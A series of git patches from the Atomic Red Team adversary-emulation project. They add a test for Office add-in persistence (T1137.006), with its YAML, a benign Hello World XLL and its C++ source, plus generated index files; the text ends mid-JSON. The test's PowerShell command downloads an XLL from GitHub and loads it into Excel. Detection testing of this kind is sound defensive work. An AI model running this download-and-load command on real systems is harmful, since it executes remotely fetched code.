From d0e8a59a287e72ee82783f20cd8c201f8e3fb409 Mon Sep 17 00:00:00 2001 
From: Brandon Morgan Date: Fri, 6 Aug 2021 16:58:52 -0500 Subject: [PATCH 01/39] T1137 xll (#1592) * upload xll and source * T1137.006 yaml * Update T1137.006.yaml fix yaml error, swap out final url for xll * cleaning directories deleted the gitignore, added src and bin directories and moved the appropriate files there. modified the xll url to include the bin directory * remove extra comments Co-authored-by: Brandon Morgan Co-authored-by: Carrie Roberts --- atomics/T1137.006/T1137.006.yaml | 30 +++ atomics/T1137.006/bin/HelloWorldXll.xll | Bin 0 -> 10240 bytes atomics/T1137.006/src/COPYING | 12 ++ atomics/T1137.006/src/HelloWorldXll.sln | 28 +++ .../src/HelloWorldXll/HelloWorldXll.cpp | 21 ++ .../src/HelloWorldXll/HelloWorldXll.def | 2 + .../src/HelloWorldXll/HelloWorldXll.vcxproj | 190 ++++++++++++++++++ .../HelloWorldXll.vcxproj.filters | 44 ++++ .../T1137.006/src/HelloWorldXll/dllmain.cpp | 19 ++ .../T1137.006/src/HelloWorldXll/stdafx.cpp | 8 + atomics/T1137.006/src/HelloWorldXll/stdafx.h | 15 ++ .../T1137.006/src/HelloWorldXll/targetver.h | 8 + atomics/T1137.006/src/readme.md | 70 +++++++ 13 files changed, 447 insertions(+) create mode 100644 atomics/T1137.006/T1137.006.yaml create mode 100644 atomics/T1137.006/bin/HelloWorldXll.xll create mode 100644 atomics/T1137.006/src/COPYING create mode 100644 atomics/T1137.006/src/HelloWorldXll.sln create mode 100644 atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.cpp create mode 100644 atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.def create mode 100644 atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj create mode 100644 atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj.filters create mode 100644 atomics/T1137.006/src/HelloWorldXll/dllmain.cpp create mode 100644 atomics/T1137.006/src/HelloWorldXll/stdafx.cpp create mode 100644 atomics/T1137.006/src/HelloWorldXll/stdafx.h create mode 100644 atomics/T1137.006/src/HelloWorldXll/targetver.h create mode 100644 atomics/T1137.006/src/readme.md 
diff --git a/atomics/T1137.006/T1137.006.yaml b/atomics/T1137.006/T1137.006.yaml
new file mode 100644
index 00000000..628ece51
--- /dev/null
+++ b/atomics/T1137.006/T1137.006.yaml
@@ -0,0 +1,30 @@
+attack_technique: T1137.006
+display_name: 'Office Application Startup: Add-ins'
+
+atomic_tests:
+- name: Code Executed Via Excel Add-in File (Xll)
+ description: |
+ Downloads a XLL file and loads it using the excel add-ins library.
+ This causes excel to display the message "Hello World"
+ Source of XLL - https://github.com/edparcell/HelloWorldXll
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ xll_url:
+ description: url of the file HelloWorldXll.xll
+ type: url
+ default: 'https://https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1137.006/bin/HelloWorldXll.xll?raw=true'
+
+ local_file:
+ description: name of the xll file
+ type: path
+ default: '$env:tmp\HelloWorldXll.xll'
+
+ executor:
+ name: powershell
+ elevation_required: true
+ command: |
+ powershell -c "iwr -URI '#{xll_url}' -o '#{local_file}'; IEX ((new-object -ComObject excel.application).RegisterXLL('$env:tmp\HelloWorldXll.xll'))"
+
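Review bot: The `xll_url` default carries a doubled scheme, `https://https://github.com/...`, so the `iwr` in the executor cannot resolve the host and the test fails before the XLL is ever loaded; drop the duplicate so it reads `default: 'https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1137.006/bin/HelloWorldXll.xll?raw=true'` (and confirm that a `tree/` path, rather than `blob/`, actually serves the raw file with `?raw=true`). The command then registers a hard-coded `$env:tmp\HelloWorldXll.xll` instead of `#{local_file}`, so overriding `local_file` downloads to one path and registers another; use `(new-object -ComObject excel.application).RegisterXLL('#{local_file}')` and drop the `IEX` wrapper, which only evaluates the boolean that RegisterXLL returns. Nothing quits the Excel COM instance or removes the downloaded file, so each run leaves an EXCEL.EXE process behind and the XLL on disk; a `cleanup_command` such as `Remove-Item '#{local_file}' -ErrorAction Ignore` plus an explicit `.Quit()` on the application object would make the atomic repeatable. `elevation_required: true` looks unnecessary for per-user COM automation of Excel, but I have not verified whether RegisterXLL needs admin on this path.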
diff --git a/atomics/T1137.006/bin/HelloWorldXll.xll b/atomics/T1137.006/bin/HelloWorldXll.xll new file mode 100644 index 0000000000000000000000000000000000000000..95d85d81d20c7286827b3ed391867e925dcb7d44 GIT binary patch literal 10240 zcmeHNe{@t;e!r8XoLi*pp#+p0;7|e**9-6 zVYLQ_tR~Mn#Zx^++uc=aPu+Igg`>v}xIIl6BngNMaZd%b3+=Yu7s7fXwgUd>>*xF4 zn~(tR_M9I7+4Y`t-}igJ-|zi?@BQBI{oXq_X?So4%VvyOQ8kURK0qoS{rlTLb_-)O zZrC@2y^(ihexJp6WPa1;P+W*f(M?jIT?hsuk*F+e6a^^}5ke86_P#Yjd$d(7D=3)e zGF9Jk^tGK^_Z&Q&sqx|F!+(Ny>50KZ9Xd=Ois^9wAxVdC>+~DmH~8N>_~hYE(6{ax zJiH$8K$hszHe@POW49SUwHTbIwQv5v9U@8z&}=S~k~c;jq=ke@Z9 zkQIV5*PvR90IAJb7p8CES&Zcnj*@{ah6XtmC5yE{)aaA}SGEmGV+mu8=<_mQ2X#i{ zG#T~qIMlNE>G&7e9aj{Oq_ER+Dd0K=1cipsgQy+nJa?R<0!c>jM6`!kxyWdg&2$Q@RH3#stv-Ti9J8q_032`j>$H01D8W$&j5KujJ6;&joAclwj#1iq zkL)VsJ&(Ht?^+lTxN^>?eC!@pPeRG|{zS36pDP>S3q^KSa^-Q%FnK`mKAct?Y>f3D zf2P*u@%+@1tPWAMI=bJ$chL67XwV9%J0Y~aU%pR0pNH0n6`zav@Rai@jEJWS;sENW z*lpeYiJR104RHbd)ds(Y_(#DXv{|8)R?JhO^&VC~%LTSwb9ArQG)=9-B5>t6PgXM7 z#g!p-CD<@r>{AZzqfYh8yIjfkDFtVc0leBV%{J$H91Aqa(QBb$FXWkOgPI)_G!wol zet^8<>HS!-sn;>){-C@6$yt+p;vskV)7nsvZ3ukz+nAlF_X6BfnXGPJh!H1lRqw{M z)c?RLs^5YedakXmWjGb~y6NW!t)S&K0|nd|N!9mjN1cWTKCmdEN4_EnfQhl{5T zB5G;UV?~l#$h( z3n#`tmgD|_xJsG=wFB$n@jmQ-IDKgi3-vXuS1u?gx$-eKO~R)B1)Shh29@_X1;#{x z(_)VP>HlaNe6HsVY={%?Va<6MA;^`(nsXlz&1uECfH2#aXJxd{g!Nooq>@OF4|^(k zwsJ3RcJ(eSH>RGumqPH!O^Ek3^FaPvv?za6@*dmmSTV{Rl|0#x-Do=m0nB|Nk$Y^< zUu#HufbRrn&=vuOtPa{X1EZxJv`Hq`hwx?m(SF)kk5JD+tA#9Iq9gus;$xInAw#rq zrQk@0h>mkGH5Hd84fCp`Oyya#mK^ATCp72SG;~*9zW}XntqvO@)r91xysJ5%BMv6J zoF`jdl^BB0wV5m6`jjDZOF0&gh%suEx`%0t37T^wx@m(+E$i_;v~>Q5_3WrKo4In< z$Vs+kG{CnicAZ-M;w`{dq!Thvip8+fP^>vu>4T~(<~?m#1uA;E*vPa=7|ynBhsgRsBx`$%39z#4GUzk#^z4 z`65@Wi^^#^6>cB1@fAaIk-LAKJN6XVp)m1Lg^}NPTgJ{)exSaJ(KlDkL24PBqn^Kj zojRnxYLKlJ{bRZ6_tDsG(G5}`B>HN^&~_XQhQ5rhKZ6|7KXsa=;sQyHT=fYcV`nGz zS04pMZNtYTQh(!I3DdbEyNm={uUw==h5a|G{yRp8tT8+Jxg{}EPYPT)!j(bIc`y7& zA+ruAW}~?)!*uM(E)V(IKRSZG`dojgE0GJ~Y&#M;O=$E8XzDKw?KbsoT@;Qr=Q&`u 
zNBe*nd)x7*EscHFJ^U8!BS&re8Qbe14Zg~qmc)Hbpjnb(+joO_Qw8z z1y5IX2f8xlgrj>mVDh5H@$^rCsQ--<0V`VC{XxQo(LP89u7eJ^fJVQO+68)Bj>Fp> zTyd^K^4RMkZTpj_SKczjlS3MRZ-~41>(>kVlsXD)T>@d{xU*n)IcC~4N*#3nxI$oN z!6)EN2!5nDW)^%3c+l35uSH)z&-(OUjD)FQ;zKco<8z>|;Xzz*mfL=WXiaqTpzT8- zIG|tD!Supy%jri(!rzyVRMWQHTbyX}-Ll{DQ*RMZ-CxYJj{?o%sp(z5)bvBVr^r>m z;+R~l+&$g5VnCXv+-c7q@U7^VkTv(0j-7IkaGYcmc16jpF7^ar(-7o2fLVIX7f<+H z=sltSIhM*j0{`Z3{~(depLU+1yr(aXvBq81r$Ax7CuHmPk;Dw#9Qx1&U=M&kYg$F@ zPYc|TPA(cH>9iih%{=vEm*;cLcH7y0_(eHkWcBZ$CoEc(!$)q~3!JHMVrQLLBI+$|TIxX`QPJT}qnB9VwLwaQ`dw(*E8hP~T9 zzDtZGYLyXX+&!GS%Tkv=wB!Oy8J`XY^_yJU@`1HO|I#QMxHEq75cPA z<0~~sb$^b9$)(jTIay4eUmYVb*S7oO7r2rMkGc3>3k;KK?)a;Lcu}olOW;89CWkDw zJ+?=Hj^%QlE3 z4gm9fIw;83B!`4S+ux%J&x7%Iz-Y}%>0T`3w?gtjp+EhOyMMXuRj_chq_suo5PI68 z5B2Xa^{)qNwM7;B*QI}F>tDP6y;=XB)g?dDzg_t5wvb-qtZY!cI2sPsE5}q^293Ks zodZUGs8fo$a?+dp)din2?EREkeabQU8n5E9Hv}84=a2ickMZD;Z{e}}VES&QsE{i) zg*a*f?4Q2Y87kk1V>!|O+z&*?Wq9CCWO^!rUa?P*57gb&a3Hh3ui zJT$rvnd6-avYNQ4X}t}&<`J)If`?yLXSiZf5T)4Pv<|*h!A#ikDRnWW8CR%=7WGFs z$#OI`U+bZGze#i3z$^hta!8ax2fmOIAQt7(cfG?TwA53`2gu6_+XH6)X zaDxfMrrfv8cA*KsFzKoZ4J(Y@ag%{PY{DB&nBgOYsdVXIe70W3x10I|6CN`8yG{55 z6YenKb`zd8VMecYp7D+syWV`y%P{_*u(90GH*P{MhQm?ev8WVoy+U*5&5`EZf;zqc zb+#dv;borJ8W-Y8kbW|uWO%fxJ?PvDUh8E%dd8blD3yK<#cs~?3f1!sKiExp1^;Ur z&lPq|!s<1(Yt}wD(&>2T*}9ikzUclkef^g-gqqtoG{;3LzG0IjZjv|P4f_!>D91N+ zgu@&3wR?b;ZXH@3w=LVSS`3SUxHy%AC(Mny6DmUy6J7d1!VnA+f}}lL|Q=W(tU+@ZdbWJCZhkYGRK+4az?VsPvcio z3xuJ9&2-wCQ_f?~)?DUXmcyJCGf(dTAH!xbywILPrFf&V6oFWUnrT~b56h{@YMklF zVUAWibD+PYB0rYtza6r>PQ7^{ z;i~l;)W1f5g1WucS&bImUhafFOP+=0Z3N$LWp>FL%WlakH^)|PDX_AFWqGWiBBwEr z>@C0>psD{J-0=Px^#kZ9Xvwm$EcjOMD?vw*ofTnTMNPS^2y-i{D2!R0Huz~Db6WaX z4#`flvT5K=tH_BNntblO)dD1qY>pP#Fs7yoL~pqkE3>>78Wx0 zJRmNFbTVYJOBwPF>j--ja`e8Kh%B+2V$Uqah`F5t<~WJA8MF@2`X|wD#+mpUXh$c} z?gp(7G(DD?QQo988nmmGKlFRSI$up79ClZfwPHb#UH$$Ve>^4zLv5j;e{&$x8WttS z7J(j@Tm5opO!S8$ZBc)#7?-7Jr#~Eu%edvRcCkG!0$W?Ny7}Iw`i8ot%gPO%b67hp zM1zdo#?Ut;%c9iIzI_Szi)HeECynW!%G)0U2M+hGCuz1D~H;}$s+GrSIgm=KupHiYohq| 
zh`%(RB$_W8eKZkUm52o8P&85(k)=+?{*^duLz0{bgqtHUi&XtHTXV#4ersJvP>hlI zD&0AZeb=@|l)sXFUDjQqT$7L_c%o5?21TUgmuyXNc_dMpRlQ2578} zk{BlkHd^mbh*D>xD78hU_CO?vSzwk3gzK-=Uf;?VOrkbzmc&3Sh-{pwYdYhy*xm#O zdE=OXNEi!e*CPy!1zh7p0C99-Phmv0;>N_LO`?<;$vt(e@2&G?qVsC|_y0;e@{lmn z_6tqRyclP47v(EDCzc3PH4*)r^84cfI){FUN_VB*fX7ge1OEk}3-^O{HyW@SXZwes zdjQ`>6+k}+(Xu*R)LP+n)*Gf5;)zr=nhp38G>{lBAg)IU7i6>@Do&(^n9(wqW`}H+|o7G z4DL=KlwXC8zpyb59^G4?xJq)UTG`Pa7PjD*6;gF|$Tkt!yxfkgD&@+xhQ3}bO zW*Zbq{7wQ^#MVYBv<10)lNg_1PG;BX=P9P`6Ss(AAxz)ul0dvZvL*VcD3u6_kT*yN zQFTdMARHG + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + {0A5476B7-2700-4B0C-A72C-3054B5064E96} + Win32Proj + HelloWorldXll + 8.1 + + + + DynamicLibrary + true + v140 + Unicode + + + DynamicLibrary + false + v140 + true + Unicode + + + DynamicLibrary + true + v140 + Unicode + + + DynamicLibrary + false + v140 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + true + .xll + + + false + + + false + .xll + + + + Use + Level3 + Disabled + WIN32;_DEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions) + true + + + Windows + true + HelloWorldXll.def + + + + + Use + Level3 + Disabled + _DEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions) + true + C:\2010 Office System Developer Resources\Excel2010XLLSDK\INCLUDE;%(AdditionalIncludeDirectories) + + + Windows + true + C:\2010 Office System Developer Resources\Excel2010XLLSDK\LIB\x64\XLCALL32.LIB;%(AdditionalDependencies) + HelloWorldXll.def + + + + + Level3 + Use + MaxSpeed + true + true + WIN32;NDEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions) + true + + + Windows + true + true + true + HelloWorldXll.def + + + + + Level3 + Use + MaxSpeed + true + true + NDEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions) + true + C:\2010 Office System Developer Resources\Excel2010XLLSDK\INCLUDE;%(AdditionalIncludeDirectories) + + + Windows + true + true + true + C:\2010 Office System 
Developer Resources\Excel2010XLLSDK\LIB\x64\XLCALL32.LIB;%(AdditionalDependencies) + HelloWorldXll.def + + + + + + + + + + + + false + + + false + + + false + + + false + + + + + + Create + Create + Create + Create + + + + + + + + + \ No newline at end of file diff --git a/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj.filters b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj.filters new file mode 100644 index 00000000..26e577de --- /dev/null +++ b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj.filters @@ -0,0 +1,44 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + + + + Header Files + + + Header Files + + + + + Source Files + + + Source Files + + + Source Files + + + + + Source Files + + + \ No newline at end of file diff --git a/atomics/T1137.006/src/HelloWorldXll/dllmain.cpp b/atomics/T1137.006/src/HelloWorldXll/dllmain.cpp new file mode 100644 index 00000000..69b58914 --- /dev/null +++ b/atomics/T1137.006/src/HelloWorldXll/dllmain.cpp @@ -0,0 +1,19 @@ +// dllmain.cpp : Defines the entry point for the DLL application. +#include "stdafx.h" + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + diff --git a/atomics/T1137.006/src/HelloWorldXll/stdafx.cpp b/atomics/T1137.006/src/HelloWorldXll/stdafx.cpp new file mode 100644 index 00000000..5708c398 --- /dev/null +++ b/atomics/T1137.006/src/HelloWorldXll/stdafx.cpp 
@@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// HelloWorldXll.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/atomics/T1137.006/src/HelloWorldXll/stdafx.h b/atomics/T1137.006/src/HelloWorldXll/stdafx.h new file mode 100644 index 00000000..bf593989 --- /dev/null +++ b/atomics/T1137.006/src/HelloWorldXll/stdafx.h @@ -0,0 +1,15 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers +// Windows Header Files: +#include + +#include +#include "xlcall.h" diff --git a/atomics/T1137.006/src/HelloWorldXll/targetver.h b/atomics/T1137.006/src/HelloWorldXll/targetver.h new file mode 100644 index 00000000..87c0086d --- /dev/null +++ b/atomics/T1137.006/src/HelloWorldXll/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include diff --git a/atomics/T1137.006/src/readme.md b/atomics/T1137.006/src/readme.md new file mode 100644 index 00000000..9f82d7ee --- /dev/null +++ b/atomics/T1137.006/src/readme.md 
@@ -0,0 +1,70 @@ +# Hello World XLL + +This is a simple XLL, showing how to create an XLL from scratch. + +## Requirements + +* A 64-bit version of Excel +* [Microsoft Visual Studio 2015 Community Edition](https://www.visualstudio.com/en-us/products/visual-studio-community-vs.aspx) +* [The Excel 2010 SDX](https://www.microsoft.com/en-us/download/details.aspx?id=20199). Instructions assume this is installed at C:\2010 Office System Developer Resources\Excel2010XLLSDK + +## Reference + +For further details on creating XLLs, dealing with XLOPERs and correct memory handling, I recommend Steve Dalton's excellent [Financial Applications using Excel Add-in Development in C/C++](http://www.amazon.com/Financial-Applications-using-Excel-Development/dp/0470027975) + +## Build and Load Instructions + +Instructions assume the solution is at "C:\Users\Jameson\Documents\Visual Studio 2015\Projects\HelloWorldXll\HelloWorldXll.sln". Adjust the steps below according to the location your cloned this project on your system. + +- Load the solution in Visual Studio. +- Build the solution (Menu: Build... Build Solution) +- In Excel, open the Add-Ins dialog (this can be done quickly with Alt-T, I) +- Click "Browse..." +- Select the XLL at "C:\Users\Jameson\Documents\Visual Studio 2015\Projects\HelloWorldXll\x64\Debug\HelloWorldXll.xll". Click OK. +- If Excel asks "A file name '...' already exists in this location. Do you want to replace it?", click Yes. +- Click Ok. +- Excel should display a dialog that says "Hello world". This is from the XLL. Click OK to dismiss the dialog. + +## Creation instructions + +- Create a new solution (Mone: File... New... Project) +- In Templates... Other Languages... Visual C++ select Win32. Select Win32 Project. Set Name to "HelloWorldXll". Set Solution name to "HelloWorldXll". Ensure "Create directory for solution" is checked. Click OK. Note: These instructions assume the Location is set to "C:\Users\Jameson\Documents\Visual Studio 2015\Projects". 
Adjust the steps below according to the location you use. +- Click Next at the Overview page. +- Select Application type "DLL". Clear the checkboxes for Precompiled header and Security Development Lifecycle. Click Finish. +- In the Solution Explorer, right click the HelloWorldXll and select Properties. +- Select Configuration "All Configurations" and Platform "x64". +- In Configuration Properties...General, Set Target Extension to ".xll". +- In Configuration Properties...C/C++...General, select "Additional Include Directories", click the dropdown arrow on the right, select "Edit...". In the Additional Include Directories dialog, click the New Line icon (it looks like a folder with a red star, in the top-right corner of the window). This will create a new line in the top input box (the ungreyed one). Click the "..." button on the right of that line, which will open a Select Directory dialog. Navigate to "C:\2010 Office System Developer Resources\Excel2010XLLSDK\INCLUDE" and click "Select Folder". Click OK to set the Additional Include Directories. +- In Configuration Proporties...Linker..Input, edit the "Additional Dependencies" as with the previous step. In the top edit box (the ungreyed one), add the text "C:\2010 Office System Developer Resources\Excel2010XLLSDK\LIB\x64\XLCALL32.LIB". Click OK to set the Additional Dependencies. 
+- In stdafx.h, add the following lines at the end of the file: +```c +#include +#include "xlcall.h" +``` +- In HelloWorldXll.cpp add the following lines at the end of the file: +```c +short __stdcall xlAutoOpen() +{ + char *text= "Hello world"; + size_t text_len = strlen(text); + XLOPER message; + message.xltype = xltypeStr; + message.val.str = (char *)malloc(text_len + 2); + memcpy(message.val.str + 1, text, text_len + 1); + message.val.str[0] = (char)text_len; + XLOPER dialog_type; + dialog_type.xltype = xltypeInt; + dialog_type.val.w = 2; + Excel4(xlcAlert, NULL, 2, &message, &dialog_type); + return 1; +} +``` +- In the Solution Explorer, right click the HelloWorldXll and select Add..New Item. +- In the Add New Item dialog, in the tree on the left, select Visual C++... Code. Then select Module-Definition File (.def). Set Name to "HelloWorldXll.def". Click Add. +- Change the contents of HelloWorldXll.def to: +``` +EXPORTS + xlAutoOpen +``` + +The solution is now ready to build and load using the instructions above. From e577e8b72f4b458a30de06757ed86950347f326c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 6 Aug 2021 21:59:18 +0000 Subject: [PATCH 02/39] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1137.006/T1137.006.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1137.006/T1137.006.yaml b/atomics/T1137.006/T1137.006.yaml index 628ece51..5ea20818 100644 --- a/atomics/T1137.006/T1137.006.yaml +++ b/atomics/T1137.006/T1137.006.yaml @@ -3,6 +3,7 @@ display_name: 'Office Application Startup: Add-ins' atomic_tests: - name: Code Executed Via Excel Add-in File (Xll) + auto_generated_guid: 441b1a0f-a771-428a-8af0-e99e4698cda3 description: | Downloads a XLL file and loads it using the excel add-ins library. This causes excel to display the message "Hello World" 
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index c952d755..30af7be8 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -758,3 +758,4 @@ c1d8c4eb-88da-4927-ae97-c7c25893803b c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 7b697ece-8270-46b5-bbc7-6b9e27081831 419cca0c-fa52-4572-b0d7-bc7c6f388a27 +441b1a0f-a771-428a-8af0-e99e4698cda3 From fcacbd16eba33b1e48671438b75c8983c91c7983 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 6 Aug 2021 21:59:23 +0000 Subject: [PATCH 03/39] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 26 +++++++++- atomics/T1137.006/T1137.006.md | 47 +++++++++++++++++++ 10 files changed, 82 insertions(+), 7 deletions(-) create mode 100644 atomics/T1137.006/T1137.006.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index a0247816..606f3545 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T100
3/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,
"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"http
